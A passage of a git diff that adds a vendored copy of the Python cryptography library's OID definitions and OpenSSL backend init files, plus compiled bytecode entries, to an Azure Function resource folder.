b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/_oid.cpython-39.pyc new file mode 100644 index 0000000..ae3e45b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/_oid.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/_oid.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/_oid.py new file mode 100644 index 0000000..a9a853a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/_oid.py @@ -0,0 +1,345 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.hazmat.primitives import hashes + + +class ObjectIdentifier: + def __init__(self, dotted_string: str) -> None: + self._dotted_string = dotted_string + + nodes = self._dotted_string.split(".") + intnodes = [] + + # There must be at least 2 nodes, the first node must be 0..2, and + # if less than 2, the second node cannot have a value outside the + # range 0..39. All nodes must be integers. + for node in nodes: + try: + node_value = int(node, 10) + except ValueError: + raise ValueError( + f"Malformed OID: {dotted_string} (non-integer nodes)" + ) + if node_value < 0: + raise ValueError( + f"Malformed OID: {dotted_string} (negative-integer nodes)" + ) + intnodes.append(node_value) + + if len(nodes) < 2: + raise ValueError( + f"Malformed OID: {dotted_string} " + "(insufficient number of nodes)" + ) + + if intnodes[0] > 2: + raise ValueError( + f"Malformed OID: {dotted_string} " + "(first node outside valid range)" + ) + + if intnodes[0] < 2 and intnodes[1] >= 40: + raise ValueError( + f"Malformed OID: {dotted_string} " + "(second node outside valid range)" + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, ObjectIdentifier): + return NotImplemented + + return self.dotted_string == other.dotted_string + + def __repr__(self) -> str: + return "".format( + self.dotted_string, self._name + ) + + def __hash__(self) -> int: + return hash(self.dotted_string) + + @property + def _name(self) -> str: + return _OID_NAMES.get(self, "Unknown OID") + + @property + def dotted_string(self) -> str: + return self._dotted_string + + +class ExtensionOID: + SUBJECT_DIRECTORY_ATTRIBUTES = ObjectIdentifier("2.5.29.9") + SUBJECT_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.14") + KEY_USAGE = ObjectIdentifier("2.5.29.15") + SUBJECT_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.17") + ISSUER_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.18") + BASIC_CONSTRAINTS = ObjectIdentifier("2.5.29.19") + NAME_CONSTRAINTS = ObjectIdentifier("2.5.29.30") + CRL_DISTRIBUTION_POINTS = ObjectIdentifier("2.5.29.31") + CERTIFICATE_POLICIES = ObjectIdentifier("2.5.29.32") + POLICY_MAPPINGS = ObjectIdentifier("2.5.29.33") + AUTHORITY_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.35") + POLICY_CONSTRAINTS = ObjectIdentifier("2.5.29.36") + EXTENDED_KEY_USAGE = ObjectIdentifier("2.5.29.37") + FRESHEST_CRL = ObjectIdentifier("2.5.29.46") + INHIBIT_ANY_POLICY = ObjectIdentifier("2.5.29.54") + ISSUING_DISTRIBUTION_POINT = ObjectIdentifier("2.5.29.28") + AUTHORITY_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.1") + SUBJECT_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.11") + OCSP_NO_CHECK = ObjectIdentifier("1.3.6.1.5.5.7.48.1.5") + TLS_FEATURE = ObjectIdentifier("1.3.6.1.5.5.7.1.24") + CRL_NUMBER = ObjectIdentifier("2.5.29.20") + DELTA_CRL_INDICATOR = ObjectIdentifier("2.5.29.27") + PRECERT_SIGNED_CERTIFICATE_TIMESTAMPS = ObjectIdentifier( + "1.3.6.1.4.1.11129.2.4.2" + ) + PRECERT_POISON = ObjectIdentifier("1.3.6.1.4.1.11129.2.4.3") + SIGNED_CERTIFICATE_TIMESTAMPS = ObjectIdentifier("1.3.6.1.4.1.11129.2.4.5") + + +class OCSPExtensionOID: + NONCE = ObjectIdentifier("1.3.6.1.5.5.7.48.1.2") + + +class CRLEntryExtensionOID: + CERTIFICATE_ISSUER = ObjectIdentifier("2.5.29.29") + CRL_REASON = ObjectIdentifier("2.5.29.21") + INVALIDITY_DATE = ObjectIdentifier("2.5.29.24") + + +class NameOID: + COMMON_NAME = ObjectIdentifier("2.5.4.3") + COUNTRY_NAME = ObjectIdentifier("2.5.4.6") + LOCALITY_NAME = ObjectIdentifier("2.5.4.7") + STATE_OR_PROVINCE_NAME = ObjectIdentifier("2.5.4.8") + STREET_ADDRESS = ObjectIdentifier("2.5.4.9") + ORGANIZATION_NAME = ObjectIdentifier("2.5.4.10") + ORGANIZATIONAL_UNIT_NAME = ObjectIdentifier("2.5.4.11") + SERIAL_NUMBER = ObjectIdentifier("2.5.4.5") + SURNAME = ObjectIdentifier("2.5.4.4") + GIVEN_NAME = ObjectIdentifier("2.5.4.42") + TITLE = ObjectIdentifier("2.5.4.12") + GENERATION_QUALIFIER = ObjectIdentifier("2.5.4.44") + X500_UNIQUE_IDENTIFIER = ObjectIdentifier("2.5.4.45") + DN_QUALIFIER = ObjectIdentifier("2.5.4.46") + PSEUDONYM = ObjectIdentifier("2.5.4.65") + USER_ID = ObjectIdentifier("0.9.2342.19200300.100.1.1") + DOMAIN_COMPONENT = ObjectIdentifier("0.9.2342.19200300.100.1.25") + EMAIL_ADDRESS = ObjectIdentifier("1.2.840.113549.1.9.1") + JURISDICTION_COUNTRY_NAME = ObjectIdentifier("1.3.6.1.4.1.311.60.2.1.3") + JURISDICTION_LOCALITY_NAME = ObjectIdentifier("1.3.6.1.4.1.311.60.2.1.1") + JURISDICTION_STATE_OR_PROVINCE_NAME = ObjectIdentifier( + "1.3.6.1.4.1.311.60.2.1.2" + ) + BUSINESS_CATEGORY = ObjectIdentifier("2.5.4.15") + POSTAL_ADDRESS = ObjectIdentifier("2.5.4.16") + POSTAL_CODE = ObjectIdentifier("2.5.4.17") + INN = ObjectIdentifier("1.2.643.3.131.1.1") + OGRN = ObjectIdentifier("1.2.643.100.1") + SNILS = ObjectIdentifier("1.2.643.100.3") + UNSTRUCTURED_NAME = ObjectIdentifier("1.2.840.113549.1.9.2") + + +class SignatureAlgorithmOID: + RSA_WITH_MD5 = ObjectIdentifier("1.2.840.113549.1.1.4") + RSA_WITH_SHA1 = ObjectIdentifier("1.2.840.113549.1.1.5") + # This is an alternate OID for RSA with SHA1 that is occasionally seen + _RSA_WITH_SHA1 = ObjectIdentifier("1.3.14.3.2.29") + RSA_WITH_SHA224 = ObjectIdentifier("1.2.840.113549.1.1.14") + RSA_WITH_SHA256 = ObjectIdentifier("1.2.840.113549.1.1.11") + RSA_WITH_SHA384 = ObjectIdentifier("1.2.840.113549.1.1.12") + RSA_WITH_SHA512 = ObjectIdentifier("1.2.840.113549.1.1.13") + RSA_WITH_SHA3_224 = ObjectIdentifier("2.16.840.1.101.3.4.3.13") + RSA_WITH_SHA3_256 = ObjectIdentifier("2.16.840.1.101.3.4.3.14") + RSA_WITH_SHA3_384 = ObjectIdentifier("2.16.840.1.101.3.4.3.15") + RSA_WITH_SHA3_512 = ObjectIdentifier("2.16.840.1.101.3.4.3.16") + RSASSA_PSS = ObjectIdentifier("1.2.840.113549.1.1.10") + ECDSA_WITH_SHA1 = ObjectIdentifier("1.2.840.10045.4.1") + ECDSA_WITH_SHA224 = ObjectIdentifier("1.2.840.10045.4.3.1") + ECDSA_WITH_SHA256 = ObjectIdentifier("1.2.840.10045.4.3.2") + ECDSA_WITH_SHA384 = ObjectIdentifier("1.2.840.10045.4.3.3") + ECDSA_WITH_SHA512 = ObjectIdentifier("1.2.840.10045.4.3.4") + ECDSA_WITH_SHA3_224 = ObjectIdentifier("2.16.840.1.101.3.4.3.9") + ECDSA_WITH_SHA3_256 = ObjectIdentifier("2.16.840.1.101.3.4.3.10") + ECDSA_WITH_SHA3_384 = ObjectIdentifier("2.16.840.1.101.3.4.3.11") + ECDSA_WITH_SHA3_512 = ObjectIdentifier("2.16.840.1.101.3.4.3.12") + DSA_WITH_SHA1 = ObjectIdentifier("1.2.840.10040.4.3") + DSA_WITH_SHA224 = ObjectIdentifier("2.16.840.1.101.3.4.3.1") + DSA_WITH_SHA256 = ObjectIdentifier("2.16.840.1.101.3.4.3.2") + DSA_WITH_SHA384 = ObjectIdentifier("2.16.840.1.101.3.4.3.3") + DSA_WITH_SHA512 = ObjectIdentifier("2.16.840.1.101.3.4.3.4") + ED25519 = ObjectIdentifier("1.3.101.112") + ED448 = ObjectIdentifier("1.3.101.113") + GOSTR3411_94_WITH_3410_2001 = ObjectIdentifier("1.2.643.2.2.3") + GOSTR3410_2012_WITH_3411_2012_256 = ObjectIdentifier("1.2.643.7.1.1.3.2") + GOSTR3410_2012_WITH_3411_2012_512 = ObjectIdentifier("1.2.643.7.1.1.3.3") + + +_SIG_OIDS_TO_HASH: typing.Dict[ + ObjectIdentifier, typing.Optional[hashes.HashAlgorithm] +] = { + SignatureAlgorithmOID.RSA_WITH_MD5: hashes.MD5(), + SignatureAlgorithmOID.RSA_WITH_SHA1: hashes.SHA1(), + SignatureAlgorithmOID._RSA_WITH_SHA1: hashes.SHA1(), + SignatureAlgorithmOID.RSA_WITH_SHA224: hashes.SHA224(), + SignatureAlgorithmOID.RSA_WITH_SHA256: hashes.SHA256(), + SignatureAlgorithmOID.RSA_WITH_SHA384: hashes.SHA384(), + SignatureAlgorithmOID.RSA_WITH_SHA512: hashes.SHA512(), + SignatureAlgorithmOID.ECDSA_WITH_SHA1: hashes.SHA1(), + SignatureAlgorithmOID.ECDSA_WITH_SHA224: hashes.SHA224(), + SignatureAlgorithmOID.ECDSA_WITH_SHA256: hashes.SHA256(), + SignatureAlgorithmOID.ECDSA_WITH_SHA384: hashes.SHA384(), + SignatureAlgorithmOID.ECDSA_WITH_SHA512: hashes.SHA512(), + SignatureAlgorithmOID.DSA_WITH_SHA1: hashes.SHA1(), + SignatureAlgorithmOID.DSA_WITH_SHA224: hashes.SHA224(), + SignatureAlgorithmOID.DSA_WITH_SHA256: hashes.SHA256(), + SignatureAlgorithmOID.ED25519: None, + SignatureAlgorithmOID.ED448: None, + SignatureAlgorithmOID.GOSTR3411_94_WITH_3410_2001: None, + SignatureAlgorithmOID.GOSTR3410_2012_WITH_3411_2012_256: None, + SignatureAlgorithmOID.GOSTR3410_2012_WITH_3411_2012_512: None, +} + + +class ExtendedKeyUsageOID: + SERVER_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.1") + CLIENT_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.2") + CODE_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.3") + EMAIL_PROTECTION = ObjectIdentifier("1.3.6.1.5.5.7.3.4") + TIME_STAMPING = ObjectIdentifier("1.3.6.1.5.5.7.3.8") + OCSP_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.9") + ANY_EXTENDED_KEY_USAGE = ObjectIdentifier("2.5.29.37.0") + SMARTCARD_LOGON = ObjectIdentifier("1.3.6.1.4.1.311.20.2.2") + KERBEROS_PKINIT_KDC = ObjectIdentifier("1.3.6.1.5.2.3.5") + IPSEC_IKE = ObjectIdentifier("1.3.6.1.5.5.7.3.17") + + +class AuthorityInformationAccessOID: + CA_ISSUERS = ObjectIdentifier("1.3.6.1.5.5.7.48.2") + OCSP = ObjectIdentifier("1.3.6.1.5.5.7.48.1") + + +class SubjectInformationAccessOID: + CA_REPOSITORY = ObjectIdentifier("1.3.6.1.5.5.7.48.5") + + +class CertificatePoliciesOID: + CPS_QUALIFIER = ObjectIdentifier("1.3.6.1.5.5.7.2.1") + CPS_USER_NOTICE = ObjectIdentifier("1.3.6.1.5.5.7.2.2") + ANY_POLICY = ObjectIdentifier("2.5.29.32.0") + + +class AttributeOID: + CHALLENGE_PASSWORD = ObjectIdentifier("1.2.840.113549.1.9.7") + UNSTRUCTURED_NAME = ObjectIdentifier("1.2.840.113549.1.9.2") + + +_OID_NAMES = { + NameOID.COMMON_NAME: "commonName", + NameOID.COUNTRY_NAME: "countryName", + NameOID.LOCALITY_NAME: "localityName", + NameOID.STATE_OR_PROVINCE_NAME: "stateOrProvinceName", + NameOID.STREET_ADDRESS: "streetAddress", + NameOID.ORGANIZATION_NAME: "organizationName", + NameOID.ORGANIZATIONAL_UNIT_NAME: "organizationalUnitName", + NameOID.SERIAL_NUMBER: "serialNumber", + NameOID.SURNAME: "surname", + NameOID.GIVEN_NAME: "givenName", + NameOID.TITLE: "title", + NameOID.GENERATION_QUALIFIER: "generationQualifier", + NameOID.X500_UNIQUE_IDENTIFIER: "x500UniqueIdentifier", + NameOID.DN_QUALIFIER: "dnQualifier", + NameOID.PSEUDONYM: "pseudonym", + NameOID.USER_ID: "userID", + NameOID.DOMAIN_COMPONENT: "domainComponent", + NameOID.EMAIL_ADDRESS: "emailAddress", + NameOID.JURISDICTION_COUNTRY_NAME: "jurisdictionCountryName", + NameOID.JURISDICTION_LOCALITY_NAME: "jurisdictionLocalityName", + NameOID.JURISDICTION_STATE_OR_PROVINCE_NAME: ( + "jurisdictionStateOrProvinceName" + ), + NameOID.BUSINESS_CATEGORY: "businessCategory", + NameOID.POSTAL_ADDRESS: "postalAddress", + NameOID.POSTAL_CODE: "postalCode", + NameOID.INN: "INN", + NameOID.OGRN: "OGRN", + NameOID.SNILS: "SNILS", + NameOID.UNSTRUCTURED_NAME: "unstructuredName", + SignatureAlgorithmOID.RSA_WITH_MD5: "md5WithRSAEncryption", + SignatureAlgorithmOID.RSA_WITH_SHA1: "sha1WithRSAEncryption", + SignatureAlgorithmOID.RSA_WITH_SHA224: "sha224WithRSAEncryption", + SignatureAlgorithmOID.RSA_WITH_SHA256: "sha256WithRSAEncryption", + SignatureAlgorithmOID.RSA_WITH_SHA384: "sha384WithRSAEncryption", + SignatureAlgorithmOID.RSA_WITH_SHA512: "sha512WithRSAEncryption", + SignatureAlgorithmOID.RSASSA_PSS: "RSASSA-PSS", + SignatureAlgorithmOID.ECDSA_WITH_SHA1: "ecdsa-with-SHA1", + SignatureAlgorithmOID.ECDSA_WITH_SHA224: "ecdsa-with-SHA224", + SignatureAlgorithmOID.ECDSA_WITH_SHA256: "ecdsa-with-SHA256", + SignatureAlgorithmOID.ECDSA_WITH_SHA384: "ecdsa-with-SHA384", + SignatureAlgorithmOID.ECDSA_WITH_SHA512: "ecdsa-with-SHA512", + SignatureAlgorithmOID.DSA_WITH_SHA1: "dsa-with-sha1", + SignatureAlgorithmOID.DSA_WITH_SHA224: "dsa-with-sha224", + SignatureAlgorithmOID.DSA_WITH_SHA256: "dsa-with-sha256", + SignatureAlgorithmOID.ED25519: "ed25519", + SignatureAlgorithmOID.ED448: "ed448", + SignatureAlgorithmOID.GOSTR3411_94_WITH_3410_2001: ( + "GOST R 34.11-94 with GOST R 34.10-2001" + ), + SignatureAlgorithmOID.GOSTR3410_2012_WITH_3411_2012_256: ( + "GOST R 34.10-2012 with GOST R 34.11-2012 (256 bit)" + ), + SignatureAlgorithmOID.GOSTR3410_2012_WITH_3411_2012_512: ( + "GOST R 34.10-2012 with GOST R 34.11-2012 (512 bit)" + ), + ExtendedKeyUsageOID.SERVER_AUTH: "serverAuth", + ExtendedKeyUsageOID.CLIENT_AUTH: "clientAuth", + ExtendedKeyUsageOID.CODE_SIGNING: "codeSigning", + ExtendedKeyUsageOID.EMAIL_PROTECTION: "emailProtection", + ExtendedKeyUsageOID.TIME_STAMPING: "timeStamping", + ExtendedKeyUsageOID.OCSP_SIGNING: "OCSPSigning", + ExtendedKeyUsageOID.SMARTCARD_LOGON: "msSmartcardLogin", + ExtendedKeyUsageOID.KERBEROS_PKINIT_KDC: "pkInitKDC", + ExtensionOID.SUBJECT_DIRECTORY_ATTRIBUTES: "subjectDirectoryAttributes", + ExtensionOID.SUBJECT_KEY_IDENTIFIER: "subjectKeyIdentifier", + ExtensionOID.KEY_USAGE: "keyUsage", + ExtensionOID.SUBJECT_ALTERNATIVE_NAME: "subjectAltName", + ExtensionOID.ISSUER_ALTERNATIVE_NAME: "issuerAltName", + ExtensionOID.BASIC_CONSTRAINTS: "basicConstraints", + ExtensionOID.PRECERT_SIGNED_CERTIFICATE_TIMESTAMPS: ( + "signedCertificateTimestampList" + ), + ExtensionOID.SIGNED_CERTIFICATE_TIMESTAMPS: ( + "signedCertificateTimestampList" + ), + ExtensionOID.PRECERT_POISON: "ctPoison", + CRLEntryExtensionOID.CRL_REASON: "cRLReason", + CRLEntryExtensionOID.INVALIDITY_DATE: "invalidityDate", + CRLEntryExtensionOID.CERTIFICATE_ISSUER: "certificateIssuer", + ExtensionOID.NAME_CONSTRAINTS: "nameConstraints", + ExtensionOID.CRL_DISTRIBUTION_POINTS: "cRLDistributionPoints", + ExtensionOID.CERTIFICATE_POLICIES: "certificatePolicies", + ExtensionOID.POLICY_MAPPINGS: "policyMappings", + ExtensionOID.AUTHORITY_KEY_IDENTIFIER: "authorityKeyIdentifier", + ExtensionOID.POLICY_CONSTRAINTS: "policyConstraints", + ExtensionOID.EXTENDED_KEY_USAGE: "extendedKeyUsage", + ExtensionOID.FRESHEST_CRL: "freshestCRL", + ExtensionOID.INHIBIT_ANY_POLICY: "inhibitAnyPolicy", + ExtensionOID.ISSUING_DISTRIBUTION_POINT: ("issuingDistributionPoint"), + ExtensionOID.AUTHORITY_INFORMATION_ACCESS: "authorityInfoAccess", + ExtensionOID.SUBJECT_INFORMATION_ACCESS: "subjectInfoAccess", + ExtensionOID.OCSP_NO_CHECK: "OCSPNoCheck", + ExtensionOID.CRL_NUMBER: "cRLNumber", + ExtensionOID.DELTA_CRL_INDICATOR: "deltaCRLIndicator", + ExtensionOID.TLS_FEATURE: "TLSFeature", + AuthorityInformationAccessOID.OCSP: "OCSP", + AuthorityInformationAccessOID.CA_ISSUERS: "caIssuers", + SubjectInformationAccessOID.CA_REPOSITORY: "caRepository", + CertificatePoliciesOID.CPS_QUALIFIER: "id-qt-cps", + CertificatePoliciesOID.CPS_USER_NOTICE: "id-qt-unotice", + OCSPExtensionOID.NONCE: "OCSPNonce", + AttributeOID.CHALLENGE_PASSWORD: "challengePassword", +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__init__.py new file mode 100644 index 0000000..f25cdb5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__init__.py @@ -0,0 +1,10 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. +from typing import Any + + +def default_backend() -> Any: + from cryptography.hazmat.backends.openssl.backend import backend + + return backend diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..56a3518 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__init__.py new file mode 100644 index 0000000..498900e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__init__.py @@ -0,0 +1,9 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography.hazmat.backends.openssl.backend import backend + + +__all__ = ["backend"] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..7e3ef81 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/aead.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/aead.cpython-39.pyc new file mode 100644 index 0000000..77fbc89 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/aead.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/backend.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/backend.cpython-39.pyc new file mode 100644 index 0000000..fce2416 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/backend.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ciphers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ciphers.cpython-39.pyc new file mode 100644 index 0000000..fb9e606 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ciphers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/cmac.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/cmac.cpython-39.pyc new file mode 100644 index 0000000..f0c35f2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/cmac.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/decode_asn1.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/decode_asn1.cpython-39.pyc new file mode 100644 index 0000000..51ad617 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/decode_asn1.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dh.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dh.cpython-39.pyc new file mode 100644 index 0000000..616904f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dh.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dsa.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dsa.cpython-39.pyc new file mode 100644 index 0000000..a17c05c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dsa.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ec.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ec.cpython-39.pyc new file mode 100644 index 0000000..50d629a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ec.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed25519.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed25519.cpython-39.pyc new file mode 100644 index 0000000..76b0320 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed25519.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed448.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed448.cpython-39.pyc new file mode 100644 index 0000000..6cabce4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ed448.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/encode_asn1.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/encode_asn1.cpython-39.pyc new file mode 100644 index 0000000..1ac7c31 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/encode_asn1.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hashes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hashes.cpython-39.pyc new file mode 100644 index 0000000..53cd8af Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hashes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hmac.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hmac.cpython-39.pyc new file mode 100644 index 0000000..58dbc1e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/hmac.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/poly1305.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/poly1305.cpython-39.pyc new file mode 100644 index 0000000..d1f850a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/poly1305.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/rsa.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/rsa.cpython-39.pyc new file mode 100644 index 0000000..bf12e80 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/rsa.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..92f5aec Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x25519.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x25519.cpython-39.pyc new file mode 100644 index 0000000..6c07a33 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x25519.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x448.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x448.cpython-39.pyc new file mode 100644 index 0000000..074ff37 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x448.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x509.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x509.cpython-39.pyc new file mode 100644 index 0000000..40ef203 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/x509.cpython-39.pyc differ diff --git 